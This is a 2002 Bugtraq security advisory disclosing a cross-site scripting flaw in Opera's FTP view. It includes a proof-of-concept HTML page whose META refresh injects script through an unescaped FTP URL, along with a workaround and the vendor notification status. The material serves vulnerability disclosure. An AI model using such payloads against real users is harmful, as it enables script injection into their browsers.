Bugtraq mailing list archives

Opera FTP View Cross-Site Scripting Vulnerability


From: "Eiji James Yoshida" <ptrs-ejy () bp iij4u or jp>
Date: Tue, 6 Aug 2002 09:08:47 +0900

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability

 
Date:
~~~~~~~~~~~~~~~~~
4 August 2002

 
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy () bp iij4u or jp]

 
Risk:
~~~~~~~~~~~~~~~~~
Medium

 
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

 
Overview:
~~~~~~~~~~~~~~~~~
Opera allows running Malicious Scripts due to a bug in 'FTP view'.
If you click on a malicious link, the script embedded in URL will run.

 
Details:
~~~~~~~~~~~~~~~~~
This problem is in 'FTP view'.
The '<title>URL</title>' is not escaped.

 
Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ; 
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/";);</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e () 
ftp opera com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/";);</script>
</body>
</html>

 
Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

 
Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.

 
Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.
 

- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik () geocities co jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPU8TMjnqpMRtMot1EQJ1DwCgs1v96kQ5KN42NVjf3rjUQO6iWOMAoKEE
e1I1peQyP4eIEgAEIhMv+x67
=6Qcu
-----END PGP SIGNATURE-----




Current thread: